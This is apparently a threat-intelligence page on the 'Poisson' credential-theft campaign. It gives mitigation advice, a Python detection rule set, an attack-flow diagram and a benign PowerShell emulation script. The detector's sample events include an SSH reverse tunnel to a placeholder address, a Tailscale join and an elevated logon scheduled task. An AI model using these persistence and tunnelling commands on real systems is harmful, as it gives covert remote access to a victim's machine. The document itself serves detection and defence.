SOC Prime Bias: High

17 Jun 2026 13:03 UTC

Operation Poisson: Breaking Down an Entire Cybercriminal Operation

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

A low-skilled threat actor known as “Poisson” carried out a multi-stage credential theft campaign aimed at French individuals and a small business. The attacker used Havoc C2, a custom Python keylogger, and built resilient access through OpenSSH and a Tailscale VPN mesh. This setup allowed the operator to retain access even after the main command-and-control infrastructure was disrupted.

Investigation

Cato CTRL conducted an in-depth post-incident review covering 33 days of attacker activity and 339 recorded commands. The investigation revealed use of free-tier services such as Backblaze B2, DuckDNS, and IONOS, along with a persistence design intended to survive C2 takedowns. Researchers also recovered the operator’s SSH playbook and victim SSH keys, which had been mistakenly exposed in a public storage bucket.

Mitigation

Defenders should generate alerts for OpenSSH server deployment on workstations and monitor for Tailscale VPN activity on systems where it is not expected. Organizations also need to detect SSH reverse tunnels and track suspicious scheduled tasks running with elevated privileges. Effective remediation must go beyond removing C2 access and include elimination of mesh-VPN-based persistence mechanisms.
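The four signals above translate directly into process-creation rules. The block below is an added example, not code from SOC Prime, Cato CTRL, or the Poisson operator: it applies those rules to events shaped like Sysmon Event ID 1 (Hostname, Image, CommandLine). The workstation naming convention (WS-, LAPTOP-, DESKTOP- prefixes), the allowlist of hosts where Tailscale is sanctioned, and every sample event (hostname, paths, the 203.0.113.10 tunnel target, the auth key) are assumptions constructed for illustration; only TaskAdmin1 and sys.vbs come from the attack flow on this page.

```python
"""Added example (not from the SOC Prime page or the Cato CTRL report): a rule set that
applies the four mitigation signals above to process-creation telemetry. Event fields
mimic Sysmon Event ID 1 (Hostname, Image, CommandLine); the hostname convention and the
sample events are constructed for illustration."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    evidence: str


# Assumption: workstations are named WS-*, LAPTOP-* or DESKTOP-*; adapt to your naming scheme.
WORKSTATION_NAME = re.compile(r"^(WS|LAPTOP|DESKTOP)-", re.IGNORECASE)
# ssh flag clusters that carry a remote forward, e.g. "-R", "-fNR", "-R2222:localhost:22".
# Case matters: OpenSSH has no lower-case -r, so the pattern is applied to the raw tokens.
SSH_REMOTE_FORWARD = re.compile(r"^-[A-Za-z]*R")
TAILSCALE_IMAGES = {"tailscale.exe", "tailscaled.exe", "tailscale-ipn.exe"}
SCHTASKS_HIGHEST = re.compile(r"/rl\s+highest")


def is_workstation(hostname: str) -> bool:
    return bool(WORKSTATION_NAME.match(hostname))


def image_name(event: dict) -> str:
    """Basename of the executed image, lower-cased, tolerant of either path separator."""
    return event.get("Image", "").replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(event: dict, tailscale_expected_hosts: frozenset[str] = frozenset()) -> list[Finding]:
    host = event.get("Hostname", "")
    image = image_name(event)
    cmd = event.get("CommandLine", "")
    low = cmd.lower()
    args = cmd.split()[1:]  # arguments after the image, case preserved for the -R check
    findings: list[Finding] = []

    # 1. OpenSSH server appearing on a workstation: the daemon itself or its installation.
    if is_workstation(host) and (
        image == "sshd.exe" or ("add-windowscapability" in low and "openssh.server" in low)
    ):
        findings.append(Finding(host, "openssh_server_on_workstation", cmd))

    # 2. Tailscale binaries on hosts where the mesh VPN is not sanctioned.
    if image in TAILSCALE_IMAGES and host not in tailscale_expected_hosts:
        findings.append(Finding(host, "tailscale_on_unexpected_host", cmd))

    # 3. SSH reverse tunnel: -R (possibly clustered with other flags) or a RemoteForward option.
    if image == "ssh.exe" and (
        any(SSH_REMOTE_FORWARD.match(a) for a in args) or "remoteforward" in low
    ):
        findings.append(Finding(host, "ssh_reverse_tunnel", cmd))

    # 4. Scheduled task registered to run with highest privileges, via schtasks or PowerShell.
    schtasks_highest = image == "schtasks.exe" and "/create" in low and SCHTASKS_HIGHEST.search(low)
    ps_highest = "register-scheduledtask" in low and "highest" in low
    if schtasks_highest or ps_highest:
        findings.append(Finding(host, "elevated_scheduled_task", cmd))

    return findings


def scan(events: list[dict], tailscale_expected_hosts: frozenset[str] = frozenset()) -> list[Finding]:
    return [f for e in events for f in detect(e, tailscale_expected_hosts)]


# Constructed sample telemetry: the first five events model the Poisson chain on one
# workstation; the last two are benign look-alikes that must not alert.
SAMPLE_EVENTS = [
    {"Hostname": "WS-FR-0142", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -Command Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0"},
    {"Hostname": "WS-FR-0142", "Image": r"C:\Windows\System32\OpenSSH\sshd.exe", "CommandLine": "sshd.exe"},
    {"Hostname": "WS-FR-0142", "Image": r"C:\Program Files\Tailscale\tailscale.exe",
     "CommandLine": "tailscale.exe up --authkey tskey-example"},
    {"Hostname": "WS-FR-0142", "Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "CommandLine": "ssh.exe -fN -R 2222:localhost:22 user@203.0.113.10"},
    {"Hostname": "WS-FR-0142", "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": 'schtasks.exe /create /tn TaskAdmin1 /tr "wscript.exe C:\\Users\\Public\\sys.vbs" /sc onlogon /rl highest'},
    # sshd on a bastion server is expected, and a local forward (-L) is not a reverse tunnel
    {"Hostname": "SRV-BASTION-01", "Image": r"C:\Windows\System32\OpenSSH\sshd.exe", "CommandLine": "sshd.exe"},
    {"Hostname": "WS-FR-0142", "Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "CommandLine": "ssh.exe -L 8080:localhost:80 dev@intranet"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.host}  {f.rule:32}  {f.evidence}")
```

Rule 1 is scoped to workstations and rule 2 to an allowlist because both OpenSSH server and Tailscale are legitimate on some hosts; alerting on their mere presence fleet-wide produces noise that hides the one workstation that matters. Rule 3 checks the raw argument tokens rather than the lower-cased command line so that flag clusters such as `-fNR` are caught without confusing `-R` with other options.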

Response

When this activity is identified, security teams should immediately locate and dismantle any active Tailscale or SSH mesh connections. Investigators should review all scheduled tasks and startup shortcuts for unauthorized persistence. A full credential reset is strongly recommended for all users, since the use of a keylogger creates a high likelihood of credential compromise.

Attack Flow

    graph TB
        %% Class definitions
        classDef action fill:#99ccff
        classDef tool fill:#cccccc
        classDef malware fill:#ff9999
        classDef persistence fill:#99ff99
        classDef command_control fill:#ffcc99

        %% Initial execution and payload delivery
        action_stager_exec["<b>Action</b> – <b>T1216 System Script Proxy Execution</b><br/>User executes VBScript stager sys.vbs to trigger System Script Proxy Execution.<br/><b>File</b>: sys.vbs"]
        class action_stager_exec action
        malware_powershell_payload["<b>Malware</b> – <b>T1059.001 Command and Scripting Interpreter: PowerShell</b><br/>Decrypted PowerShell payload used to download the primary malware.<br/><b>Type</b>: Stager/Downloader"]
        class malware_powershell_payload malware
        action_download_primary["<b>Action</b> – <b>T1105 Ingress Tool Transfer</b><br/>Downloading the primary malware implant via PowerShell."]
        class action_download_primary action

        %% Obfuscation and loading
        malware_senti_dll["<b>Malware</b> – <b>Name</b>: senti.dll<br/><b>Techniques</b>: T1027.009 Embedded Payloads and T1027.015 Compression<br/>Uses five-layer matryoshka encoding to hide shellcode within English words in a .NET DLL.<br/><b>Goal</b>: Fileless execution"]
        class malware_senti_dll malware

        %% Privilege escalation and persistence
        action_uac_bypass["<b>Action</b> – <b>T1204 User Execution</b><br/>Attempted privilege escalation using Start-Process -Verb RunAs to trigger UAC prompts."]
        class action_uac_bypass action
        persist_task_admin["<b>Persistence</b> – <b>T1053 Scheduled Task/Job</b><br/>Created TaskAdmin1 to run the stager with highest privileges at logon."]
        class persist_task_admin persistence
        persist_startup_lnk["<b>Persistence</b> – <b>T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</b><br/>Placed startup shortcut sys.lnk in the Startup folder."]
        class persist_startup_lnk persistence

        %% Credential theft
        tool_keylogger["<b>Tool</b> – <b>Name</b>: KeyL.zip<br/><b>Technique</b>: T1056.001 Input Capture: Keylogging<br/>Custom 70-line Python keylogger to harvest banking and email credentials."]
        class tool_keylogger tool

        %% Command and control
        c2_havoc["<b>Command and Control</b> – <b>Name</b>: Havoc Framework<br/>Primary C2 management framework."]
        class c2_havoc command_control
        tool_rustdesk["<b>Tool</b> – <b>T1219 Remote Access Software</b><br/>Custom-compiled RustDesk installed for redundancy."]
        class tool_rustdesk tool

        %% Resilient persistence
        persist_ssh_tailscale["<b>Persistence</b> – <b>T1668 Exclusive Control</b><br/>Installed OpenSSH Server and joined Tailscale VPN mesh to survive C2 takedown."]
        class persist_ssh_tailscale persistence
        action_ssh_tunnel["<b>Action</b> – <b>T1219.001 IDE Tunneling and T1572 Protocol Tunneling</b><br/>Used SSH reverse tunnel ssh -R to maintain direct encrypted access."]
        class action_ssh_tunnel action

        %% Connection flow
        action_stager_exec -->|executes| malware_powershell_payload
        malware_powershell_payload -->|downloads| action_download_primary
        action_download_primary -->|loads| malware_senti_dll
        malware_senti_dll -->|triggers| action_uac_bypass
        action_uac_bypass -->|establishes| persist_task_admin
        action_uac_bypass -->|establishes| persist_startup_lnk
        malware_senti_dll -->|deploys| tool_keylogger
        malware_senti_dll -->|communicates with| c2_havoc
        c2_havoc -->|deploys redundant| tool_rustdesk
        tool_rustdesk -->|leads to| persist_ssh_tailscale
        persist_ssh_tailscale -->|uses| action_ssh_tunnel

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands: The adversary, simulating the “Poisson” group, aims to establish a remote access foothold. First, they stage a payload by creating a file named thales.zip in a temporary directory. To elevate privileges, they execute a PowerShell command using the RunAs verb, which is a common method for triggering UAC prompts. Finally, they execute rustdesk.exe to provide a secondary remote desktop communication channel. This sequence mimics the specific behavioral pattern (UAC elevation + RustDesk + specific zip file) defined in the detection rule.

  • Regression Test Script:

    # Simulation Script: Poisson TTP Emulation
    # Run from an unelevated PowerShell session on a test host with process-creation
    # logging enabled (Sysmon Event ID 1 or Security 4688 with command-line auditing).
    
    # 1. Stage the 'thales.zip' file (required by detection logic)
    $targetZip = "$env:TEMP\thales.zip"
    New-Item -Path $targetZip -ItemType File -Force | Out-Null
    Write-Host "[+] Staged $targetZip"
    
    # 2. Simulate UAC elevation attempt via PowerShell (required by detection logic)
    # Note: This triggers a UAC prompt. The prompt must be accepted for the elevated child
    # process to appear in telemetry; declining it raises an error, which is caught here.
    Write-Host "[+] Attempting UAC elevation via Start-Process -Verb RunAs..."
    try {
        Start-Process powershell.exe -ArgumentList "-Command Write-Host 'Elevation Attempted'" -Verb RunAs -Wait
    } catch {
        Write-Host "[-] Elevation was declined or blocked: $($_.Exception.Message)"
    }
    
    # 3. Simulate execution of RustDesk (required by detection logic)
    # An empty file named rustdesk.exe cannot be launched, so it would produce no
    # process-creation event. Copying a benign system binary under that name yields a
    # real process whose image name is rustdesk.exe, without installing the remote access tool.
    $rustdeskPath = "$env:TEMP\rustdesk.exe"
    Copy-Item -Path "$env:SystemRoot\System32\cmd.exe" -Destination $rustdeskPath -Force
    Write-Host "[+] Executing simulated RustDesk at $rustdeskPath"
    Start-Process -FilePath $rustdeskPath -ArgumentList "/c exit" -Wait

  • Cleanup Commands:

    # Cleanup Simulation Artifacts
    Remove-Item -Path "$env:TEMP\thales.zip" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMP\rustdesk.exe" -Force -ErrorAction SilentlyContinue
    Write-Host "[+] Cleanup complete."